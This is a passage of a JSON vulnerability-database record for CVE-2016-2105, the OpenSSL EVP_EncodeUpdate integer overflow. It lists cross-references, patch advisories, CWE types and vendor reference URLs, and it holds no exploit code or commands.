          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-90924",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-90924"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2016-2105",
        "trust": 3.2
      },
      {
        "db": "BID",
        "id": "89757",
        "trust": 2.0
      },
      {
        "db": "BID",
        "id": "91787",
        "trust": 1.7
      },
      {
        "db": "SECTRACK",
        "id": "1035721",
        "trust": 1.7
      },
      {
        "db": "MCAFEE",
        "id": "SB10160",
        "trust": 1.7
      },
      {
        "db": "PACKETSTORM",
        "id": "136912",
        "trust": 1.7
      },
      {
        "db": "TENABLE",
        "id": "TNS-2016-18",
        "trust": 1.7
      },
      {
        "db": "SIEMENS",
        "id": "SSA-412672",
        "trust": 1.7
      },
      {
        "db": "JUNIPER",
        "id": "JSA10759",
        "trust": 1.7
      },
      {
        "db": "JVN",
        "id": "JVNVU93163809",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU94844193",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002472",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-081",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.0696",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2148",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "143513",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136895",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "138471",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "142803",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "138472",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136893",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136919",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139379",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "140056",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-90924",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "136958",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139167",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "137958",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "139116",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-90924"
      },
      {
        "db": "BID",
        "id": "89757"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002472"
      },
      {
        "db": "PACKETSTORM",
        "id": "136958"
      },
      {
        "db": "PACKETSTORM",
        "id": "139167"
      },
      {
        "db": "PACKETSTORM",
        "id": "137958"
      },
      {
        "db": "PACKETSTORM",
        "id": "139116"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-081"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2105"
      }
    ]
  },
  "id": "VAR-201605-0075",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-90924"
      }
    ],
    "trust": 0.5305209371428571
  },
  "last_update_date": "2024-07-23T20:50:28.659000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "APPLE-SA-2016-07-18-1 OS X El Capitan v10.11.6 and Security Update 2016-004",
        "trust": 0.8,
        "url": "http://lists.apple.com/archives/security-announce/2016/jul/msg00000.html"
      },
      {
        "title": "HT206903",
        "trust": 0.8,
        "url": "https://support.apple.com/en-us/ht206903"
      },
      {
        "title": "HT206903",
        "trust": 0.8,
        "url": "https://support.apple.com/ja-jp/ht206903"
      },
      {
        "title": "HPSBMU03691",
        "trust": 0.8,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722"
      },
      {
        "title": "SB10160",
        "trust": 0.8,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10160"
      },
      {
        "title": "NV16-015",
        "trust": 0.8,
        "url": "http://jpn.nec.com/security-info/secinfo/nv16-015.html"
      },
      {
        "title": "Major changes between OpenSSL 1.0.1s and OpenSSL 1.0.1t [3 May 2016]",
        "trust": 0.8,
        "url": "https://www.openssl.org/news/openssl-1.0.1-notes.html"
      },
      {
        "title": "Major changes between OpenSSL 1.0.2g and OpenSSL 1.0.2h [3 May 2016]",
        "trust": 0.8,
        "url": "https://www.openssl.org/news/openssl-1.0.2-notes.html"
      },
      {
        "title": "Avoid overflow in EVP_EncodeUpdate",
        "trust": 0.8,
        "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=5b814481f3573fa9677f3a31ee51322e2a22ee6a"
      },
      {
        "title": "EVP_EncodeUpdate overflow (CVE-2016-2105)",
        "trust": 0.8,
        "url": "https://www.openssl.org/news/secadv/20160503.txt"
      },
      {
        "title": "openSUSE-SU-2016:1566",
        "trust": 0.8,
        "url": "https://lists.opensuse.org/opensuse-security-announce/2016-06/msg00019.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - October 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - July 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html"
      },
      {
        "title": "Oracle Linux Bulletin - July 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjul2016-3090544.html"
      },
      {
        "title": "Oracle Solaris Third Party Bulletin - April 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html"
      },
      {
        "title": "Oracle VM Server for x86 Bulletin - July 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
      },
      {
        "title": "Oracle Linux Bulletin - April 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html"
      },
      {
        "title": "RHSA-2016:0722",
        "trust": 0.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-0722.html"
      },
      {
        "title": "RHSA-2016:0996",
        "trust": 0.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-0996.html"
      },
      {
        "title": "SA40202",
        "trust": 0.8,
        "url": "https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40202"
      },
      {
        "title": "July 2016 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update"
      },
      {
        "title": "JSA10759",
        "trust": 0.8,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759 "
      },
      {
        "title": "TLSA-2016-14",
        "trust": 0.8,
        "url": "http://www.turbolinux.co.jp/security/2016/tlsa-2016-14j.html"
      },
      {
        "title": "HS16-023",
        "trust": 0.8,
        "url": "http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs16-023/index.html"
      },
      {
        "title": "OpenSSL Fixes for integer overflow vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=61406"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002472"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201605-081"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-190",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-189",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-90924"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002472"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-2105"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.3,
        "url": "http://www.securityfocus.com/bid/89757"
      },
      {
        "trust": 2.3,
        "url": "http://www.securityfocus.com/bid/91787"
      },
      {
        "trust": 2.3,
        "url": "http://www.debian.org/security/2016/dsa-3566"
      },
      {
        "trust": 2.3,
        "url": "http://packetstormsecurity.com/files/136912/slackware-security-advisory-openssl-updates.html"
      },
      {
        "trust": 2.0,
        "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160504-openssl"
      },
      {
        "trust": 2.0,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
      },
      {
        "trust": 2.0,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html"
      },
      {
        "trust": 2.0,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjul2016-3090544.html"
      },
      {
        "trust": 2.0,
        "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
      },
      {
        "trust": 2.0,
        "url": "https://www.openssl.org/news/secadv/20160503.txt"
      },
      {
        "trust": 2.0,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-0722.html"
      },
      {
        "trust": 1.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-0996.html"
      },
      {
        "trust": 1.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2056.html"
      },
      {
        "trust": 1.8,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2073.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.apple.com/archives/security-announce/2016/jul/msg00000.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html"
      },
      {
        "trust": 1.7,
        "url": "https://bto.bluecoat.com/security-advisory/sa123"
      },
      {
        "trust": 1.7,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf"
      },
      {
        "trust": 1.7,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05320149"
      },
      {
        "trust": 1.7,
        "url": "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722"
      },
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20160504-0001/"
      },
      {
        "trust": 1.7,
        "url": "https://source.android.com/security/bulletin/pixel/2017-11-01"
      },
      {
        "trust": 1.7,
        "url": "https://support.apple.com/ht206903"
      },
      {
        "trust": 1.7,
        "url": "https://www.tenable.com/security/tns-2016-18"
      },
      {
        "trust": 1.7,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-may/183457.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-may/183607.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-may/184605.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.freebsd.org/security/advisories/freebsd-sa-16:17.openssl.asc"
      },
      {
        "trust": 1.7,
        "url": "https://security.gentoo.org/glsa/201612-16"
      },
      {
        "trust": 1.7,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-1648.html"
      },
      {
        "trust": 1.7,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-1649.html"
      },
      {
        "trust": 1.7,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-1650.html"
      },
      {
        "trust": 1.7,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-2957.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1035721"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00001.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00008.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00010.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00011.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00029.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00036.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00055.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00013.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00014.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00015.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00016.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00017.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00018.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00019.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-05/msg00030.html"
      },
      {
        "trust": 1.7,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-06/msg00019.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.ubuntu.com/usn/usn-2959-1"
      },
      {
        "trust": 1.6,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03756en_us"
      },
      {
        "trust": 1.6,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03765en_us"
      },
      {
        "trust": 1.6,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026id=sb10160"
      },
      {
        "trust": 1.6,
        "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026y=2016\u0026m=slackware-security.542103"
      },
      {
        "trust": 1.6,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10759"
      },
      {
        "trust": 1.0,
        "url": "https://git.openssl.org/?p=openssl.git%3ba=commit%3bh=5b814481f3573fa9677f3a31ee51322e2a22ee6a"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2105"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu93163809/"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/vu/jvnvu94844193/index.html"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-2105"
      },
      {
        "trust": 0.8,
        "url": "http://www.aratana.jp/security/detail.php?id=16"
      },
      {
        "trust": 0.7,
        "url": "https://git.openssl.org/?p=openssl.git;a=commit;h=5b814481f3573fa9677f3a31ee51322e2a22ee6a"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.0696"
      },
      {
        "trust": 0.6,
        "url": "http://www.ibm.com/support/docview.wss?uid=ibm10887855"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.2148/"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105"
      },
      {
        "trust": 0.3,
        "url": "http://openssl.org/"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2016/may/25"
      },
      {
        "trust": 0.3,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05320149"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023779"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023814"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024319"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024507"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000158"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021361"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021376"
      },
      {
        "trust": 0.3,
        "url": "https://www.openssl.org/news/vulnerabilities.html"
      },
      {
        "trust": 0.3,
        "url": "https://securityadvisories.paloaltonetworks.com/home/detail/56?aspxautodetectcookiesupport=1"
      },
      {
        "trust": 0.3,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987903"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024066"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988007"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009147"
      },
      {
        "trust": 0.3,
        "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21982823"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21982949"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983158"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983514"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983555"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984323"
      },
      {
        "trust": 0.3,
        "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21984483"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984583"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984609"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984794"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984920"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21984977"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985736"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985981"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986068"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986123"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986152"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986260"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986473"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986506"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986563"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986564"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986669"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987671"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987707"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987779"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21987968"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988055"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988071"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988189"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988350"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988383"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988976"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21989046"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992493"
      },
      {
        "trust": 0.3,
        "url": "http://www-01.ibm.com/support/docview.wss?uid=swg2c1000192"
      },
      {
        "trust": 0.3,
        "url": "http://aix.software.ibm.com/aix/efixes/security/openssl_advisory20.asc"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2016-2109"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2016-2106"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2016-2105"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.3,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2016-2108"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-2107"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0799"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-2842"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-0799"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2842"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.1,
        "url": "http://kb.juniper.net/infocenter/index?page=content\u0026amp;id=jsa10759"
      },
      {
        "trust": 0.1,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026amp;docid=emr_na-hpesbhf03756en_us"
      },
      {
        "trust": 0.1,
        "url": "https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026amp;docid=emr_na-hpesbhf03765en_us"
      },
      {
        "trust": 0.1,
        "url": "https://kc.mcafee.com/corporate/index?page=content\u0026amp;id=sb10160"
      },
      {
        "trust": 0.1,
        "url": "http://www.slackware.com/security/viewer.php?l=slackware-security\u0026amp;y=2016\u0026amp;m=slackware-security.542103"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0718"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4599"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4601"
      },
      {
        "trust": 0.1,
        "url": "https://gpgtools.org"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4449"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4483"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1836"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4600"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1865"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4597"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4596"
      },
      {
        "trust": 0.1,
        "url": "http://www.apple.com/support/downloads/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4447"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1863"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4582"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4595"
      },
      {
        "trust": 0.1,
        "url": "https://www.apple.com/support/security/pgp/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1864"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9862"
      },
      {
        "trust": 0.1,
        "url": "http://support.apple.com/kb/ht201222"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4607"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4448"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4598"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1684"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4602"
      },
      {
        "trust": 0.1,
        "url": "https://support.apple.com/kb/ht206900"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2176"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4594"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/2688611"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/solutions/222023"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4459"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-4000"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-4000"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3183"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en/jboss-enterprise-application-platform/"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-3110"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4459"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-3195"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-3183"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3110"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform\u0026downloadtype=securitypatches\u0026version=6.4"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-90924"
      },
      {
        "db": "BID",
        "id": "89757"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-002472"
      },
      {
        "db": "PACKETSTORM",
        "id": "136958"
      },
      {
        "db": "PACKETSTORM",
        "id": "139167"
      },
      {
        "db": "PACKETSTORM",
        "id": "137958"
      },
      {
